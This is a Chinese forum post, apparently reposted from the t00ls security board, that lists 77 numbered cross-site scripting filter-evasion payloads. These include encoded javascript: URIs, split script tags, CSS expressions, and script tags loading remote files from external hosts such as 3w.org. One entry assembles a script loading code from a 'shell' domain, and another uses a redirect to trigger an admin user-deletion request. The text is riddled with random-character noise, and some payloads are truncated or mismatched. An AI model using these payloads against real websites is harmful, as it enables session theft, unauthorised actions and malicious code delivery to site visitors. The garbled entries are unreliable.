貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。 [ U3 ]4 m) o) W) p, J5 }8 G
(1)普通的XSS JavaScript注入2 A/ E- Y; N; O9 z+ E; f
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" C- T) A9 |( M5 {% y
(2)IMG标签XSS使用JavaScript命令
9 N7 F0 Z& c8 `1 c8 C. P<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! V ^" N8 b( G6 N0 V# |$ |5 L
(3)IMG标签无分号无引号
5 n3 C1 Q1 U2 D: g" }. E! D# W<IMG SRC=javascript:alert(‘XSS’)>
% \+ {& D; V% ?2 _% F5 i(4)IMG标签大小写不敏感/ i, n! S, b' t% r, U- ]* O6 z y4 J
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>0 `1 J% d& U4 v$ E/ h
(5)HTML编码(必须有分号)
) ]4 L& e. ~9 `' d- {<IMG SRC=javascript:alert(“XSS”)>
8 Y$ O" N% w0 {/ P# n E(6)修正缺陷IMG标签4 c6 f; f1 N6 A' ~+ [
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>3 E% H8 `2 {/ W4 x1 C
# o( I, }$ P5 F; B4 s
1 _, i( |9 Q: m8 D6 f$ S4 i(7)formCharCode标签(计算器)$ K/ L5 h0 `" c! s% h
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>* }( I) G r4 V2 Z
(8)UTF-8的Unicode编码(计算器)
) z: ^+ r% \' C- {2 b, G<IMG SRC=jav..省略..S')>
% E1 @7 Z3 t' d* |, K2 n(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
) F' C* u1 O. M' G) t6 y, p<IMG SRC=jav..省略..S')>. C0 i- x6 q% j+ Y/ N4 e- ~ y
(10)十六进制编码也是没有分号(计算器)
; K! r# W/ G g& j, G8 w<IMG SRC=java..省略..XSS')>- B/ I- {4 L" w- b. S7 d
(11)嵌入式标签,将Javascript分开
1 I& E- G0 v1 z1 Z A8 j<IMG SRC=”jav ascript:alert(‘XSS’);”>" I6 ^) G* e# ]: ?5 F$ p1 y
(12)嵌入式编码标签,将Javascript分开2 M+ j8 J$ t# a# O) b& O
<IMG SRC=”jav ascript:alert(‘XSS’);”>8 X+ y0 T" T3 G$ r1 |$ }
(13)嵌入式换行符
8 o( s; i" j6 V ] x<IMG SRC=”jav ascript:alert(‘XSS’);”>+ j% w! L+ ~* W( ~
(14)嵌入式回车9 i( V Q& G5 w1 ] \2 g6 a8 y- d
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 t3 ~' n2 T* @+ }; m8 P6 h
(15)嵌入式多行注入JavaScript,这是XSS极端的例子/ q, F' J- w" n2 f% g" g+ j
<IMG SRC=”javascript:alert(‘XSS‘)”>+ V U0 t; c; \3 x/ A5 F- N4 S
(16)解决限制字符(要求同页面)4 _- x- N. I( H
<script>z=’document.’</script>
6 K) G! h# f$ S<script>z=z+’write(“‘</script>
4 _; B: e |( n& j$ ^1 w; \" @<script>z=z+’<script’</script>
3 |% k2 P; i* \<script>z=z+’ src=ht’</script>9 y, M5 ]. r- e( `) z
<script>z=z+’tp://ww’</script>) {, }! \& e; A" k* B! l
<script>z=z+’w.shell’</script>( E8 w' P, G: g D6 K9 R1 p7 m
<script>z=z+’.net/1.’</script>
4 z a# n+ O( h5 V# X. T, S2 S<script>z=z+’js></sc’</script>7 F1 `( t; O: o7 K6 p2 s+ a3 T
<script>z=z+’ript>”)’</script>! c# B8 L( y9 R" r' y
<script>eval_r(z)</script>& G% V% q& }# ]9 y5 p; O9 `1 C" y
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
# A# f, h! M1 Fhttps://www.t00ls.net/viewthread ... table&tid=15267 2/63 Z& A" Y7 [ D: u4 d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out2 q. v c" y# X. k8 n' L! {1 N' x
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
/ s9 E+ Q* @2 i+ X. Dperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
4 p5 B3 M& X& Y* c(19)Spaces和meta前的IMG标签 L1 ]: E5 e6 @( s: [ q
<IMG SRC=” javascript:alert(‘XSS’);”>
. d! `9 v/ g0 P) k/ Y(20)Non-alpha-non-digit XSS
' i; K) w* c4 t) L9 j<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 Z( B/ ^: t! Y0 K
(21)Non-alpha-non-digit XSS to 2
( t' v7 t" Q. P<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 ?5 z3 @- Y' b% l0 ]
(22)Non-alpha-non-digit XSS to 3 E3 r: d5 Q( L% f/ B: X
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' I/ K$ q2 g/ }% w3 m
(23)双开括号
6 E! u' S$ p% S2 M<<SCRIPT>alert(“XSS”);//<</SCRIPT>
' u) D" f6 m" x& n( C(24)无结束脚本标记(仅火狐等浏览器)8 M% ^ k% a, |3 q$ {% j1 ~' U1 e# j
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>. m) d" Z* y+ K3 J" {
(25)无结束脚本标记29 }% [9 M8 p! w% B
<SCRIPT SRC=//3w.org/XSS/xss.js>* E$ W( h* Z2 w" a- t. \
(26)半开的HTML/JavaScript XSS6 Q( T2 h6 D& H* \ Q
<IMG SRC=”javascript:alert(‘XSS’)”; c, G; U4 I- W! e0 r( Y$ }
(27)双开角括号( V1 K+ X6 v7 |1 W7 S4 K9 h* O
<iframe src=http://3w.org/XSS.html <3 o, n& j3 u& q% x5 o7 E
(28)无单引号 双引号 分号! p2 ~. ^6 t A* ~
<SCRIPT>a=/XSS/
- j5 k' c$ x5 v* ?/ S& \$ Q$ Kalert(a.source)</SCRIPT>
& p! K1 ~ e# N$ S! k3 ~ H(29)换码过滤的JavaScript
0 t( _- E1 h0 ~) m$ q0 Q\”;alert(‘XSS’);//# e: b6 K5 X7 Y' Q3 q
(30)结束Title标签
# z8 Y0 a" h9 k3 |6 p</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 v- G' d% |% ?5 E" w% W4 i+ O" ?
(31)Input Image
' w3 o" ]# a0 _ y( ~1 Y<INPUT SRC=”javascript:alert(‘XSS’);”>
2 M% A C4 O" X$ t! k(32)BODY Image
/ ~* e; n4 R1 \9 Q<BODY BACKGROUND=”javascript:alert(‘XSS’)”>9 }9 {6 Y5 ^! t6 H3 g4 w7 I/ d
(33)BODY标签
1 S- y7 W3 \# o4 [. o, T7 M<BODY(‘XSS’)>: {" x! t L) v3 Z! B
(34)IMG Dynsrc# c: i+ e9 x( D2 L5 p Y6 x
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ R: T" T/ P$ j. v% V1 @& E(35)IMG Lowsrc
& i8 j+ ~' T( m- p2 b4 t% d1 G<IMG LOWSRC=”javascript:alert(‘XSS’)”>2 Z* Q' |- U& }1 f, W
(36)BGSOUND% e, Z" B! a- ?+ A4 k. H1 \1 o$ S
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
0 f0 o. F/ z7 \(37)STYLE sheet
# L ~8 e; f3 i! o<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>; C6 j# o" a) \4 w, d# S
(38)远程样式表
( h7 q! j. k) }9 n7 x<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( o' w+ F5 R) Y8 u(39)List-style-image(列表式)
$ n% t2 i0 }9 K9 n4 b<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: g# {6 r9 y: e4 k. ?. H- x- q(40)IMG VBscript
: Q; ]$ N) V) @* ?+ _5 h3 r<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
7 J; M, N5 A) M, ]* e2 T0 t, q(41)META链接url9 {4 ]7 O) v& f3 ~: V
( p% h" x, z1 B/ }, w0 l
5 Y) ?, ]" Y1 g
<META HTTP-EQUIV=”refresh” CONTENT=”0;
5 `, G- d {. M" e+ GURL=http://;URL=javascript:alert(‘XSS’);”>
3 m w3 _0 u9 e" b |(42)Iframe
" f b# Q3 @7 r# y0 A5 c<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>6 N4 X; ~6 ~0 j& ^* t
(43)Frame
3 O. q+ I% o7 M. ^! J+ n<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
) e6 O! ]2 \! _, H% p$ thttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
; o- J9 f( Z: A1 V(44)Table" W# ?# r2 G8 L2 ?! c* X( y
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 ]; N9 O0 ^* L3 Q! Q
(45)TD* C% D$ b7 i0 q! R% Q
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) [2 [ ]5 g6 w6 Q5 Z+ T(46)DIV background-image$ v+ T6 X6 v2 k. ~6 n+ X
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 S- U. Z; T2 d* r8 s
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
+ z/ `, w) Q# r7 U4 E5 N8&13&12288&65279)
& t/ f8 Q! u# I* d<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* [# J0 |& k: [3 G2 c
(48)DIV expression
, ^+ H" I, a' M n3 a' P<DIV STYLE=”width: expression_r(alert(‘XSS’));”>5 O3 K0 A w" p
(49)STYLE属性分拆表达* X0 o; }' z) t# W; R! t
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 r y: p# V/ `' ?4 [(50)匿名STYLE(组成:开角号和一个字母开头)
2 |* D' }, l7 _" M4 F<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
) B5 R$ N# r5 O6 f2 Y(51)STYLE background-image& d8 q0 i3 o5 }( l y( J! m
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
5 e8 L& I! v# pCLASS=XSS></A>5 {& C4 X% u0 Q+ l. q( b9 y
(52)IMG STYLE方式
( g# E: S, i6 p, ~* V% ]1 d' dexppression(alert(“XSS”))’>
0 z" Q$ R; Y5 T$ t(53)STYLE background
' Q- x) \/ R' F* k! b0 _<STYLE><STYLE
' E+ Z" i( t0 Stype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' I5 C4 _& t) F+ N0 E
(54)BASE# m _+ F' D2 f, N D
<BASE HREF=”javascript:alert(‘XSS’);//”>
& @) y& N( x. t) g(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 u K0 J/ N0 ~' D5 L1 v
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
: Z" {" s4 l( q" F(56)在flash中使用ActionScrpt可以混进你XSS的代码* ?# q* H3 y7 Y7 M* v
a=”get”; e6 q- S' Q! x: O W9 R
b=”URL(\”";$ ^ f+ e" s0 D% @3 u# }$ X
c=”javascript:”;3 x0 r3 L4 F M+ @( N
d=”alert(‘XSS’);\”)”;6 n8 `( C3 ^& @4 p# Z) m
eval_r(a+b+c+d);
7 R8 r0 n6 K8 j; A- ^$ n' U8 Q2 i(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
8 D0 H/ [1 n; U% |9 {, f1 }$ i<HTML xmlns:xss>
* o: T! w2 v/ [4 Q e9 M- v. r t<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 g2 W4 h- H+ K/ q: a- l4 Q<xss:xss>XSS</xss:xss>
; q1 m6 T8 o& A; ]* u6 ]</HTML>
S+ F$ N# l) I& a+ K" ~/ T; I(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
9 L" o4 F3 Y6 S<SCRIPT SRC=””></SCRIPT>5 W# c- X! y D* A: t
(59)IMG嵌入式命令,可执行任意命令 h. x, F& d3 o2 A
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
- G, ^, k+ @, g6 x' U(60)IMG嵌入式命令(a.jpg在同服务器). J1 D, a2 ?4 p5 |# s; Y. |( A
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
& V. w* u+ C9 {: {7 r; E(61)绕符号过滤9 I3 z( F% g5 i$ v. d8 T) z
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># q8 L% y, ?0 m2 {% ^1 B
(62)/ s9 K5 `2 D e* q
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 e |' ?% @" h4 ]$ d: y3 H( E(63)
D& z9 i+ P6 h2 E<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# D$ H2 }) x$ @; I1 N) U(64)& }7 c* P( R# |7 m; ~
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>5 V# X0 c8 p2 j% U9 G
(65)
* Z( L. B2 |3 [4 y2 a8 `: |<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
P% l$ ~8 I$ T/ O9 \(66)12-7-1 T00LS - Powered by Discuz! Board' C. z8 t9 `" k" o$ H6 K g6 n
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
' u2 L& C, ]! Q& ^<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 l; a* b- f8 b* P$ J(67)
: i& V; `3 ]% v# G; _; c<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
& _' r" {4 b1 T8 K# a* R1 e1 x</SCRIPT>/ n* I9 ?' ~# }& ?. {% Y) N
(68)URL绕行! h+ F0 Q1 @; H& j/ ?& U
<A HREF=”http://127.0.0.1/”>XSS</A>' V8 ~" x+ E* q( r
(69)URL编码9 M5 c# r! A' K) b o
<A HREF=”http://3w.org”>XSS</A>0 A! ~2 [6 r$ G
(70)IP十进制
9 d3 S* g1 N* n# S1 u9 Y3 F5 l<A HREF=”http://3232235521″>XSS</A>
) }0 ? c' `, M# j(71)IP十六进制1 q: S9 g# }# ?2 s
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ R \7 u6 T" U& b+ y0 s(72)IP八进制) d7 h+ h* a/ [: S
<A HREF=”http://0300.0250.0000.0001″>XSS</A>" @3 [1 S& r9 R! `
(73)混合编码2 a' f8 n% @& u5 R6 K4 I, d8 `
<A HREF=”h6 [& P5 {0 J/ O6 a2 o) u1 t, f
tt p://6 6.000146.0×7.147/”">XSS</A>0 I! R; |! z$ @& O
(74)节省[http:]) I$ C6 H i1 \6 b% \
<A HREF=”//www.google.com/”>XSS</A>
6 h; [4 s, p. G0 |. n; w(75)节省[www]
; I% v4 V# E( `( n2 c<A HREF=”http://google.com/”>XSS</A>! |2 C: l7 [, q7 c$ ^- W* V
(76)绝对点绝对DNS
; K3 P% m' q; t<A HREF=”http://www.google.com./”>XSS</A>6 |: a% k' C7 g% W" g/ [! `
(77)javascript链接
6 a8 [8 W' @9 s; E4 J {<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
2 ^4 f: Y1 Z' g+ ~" G q/ m8 H* c
# c. J: ^0 Z, F3 r: Q原文地址:http://fuzzexp.org/u/0day/?p=14
* F7 U% e2 {/ ^. s9 |* i
# H# u% ~- e; x3 ] |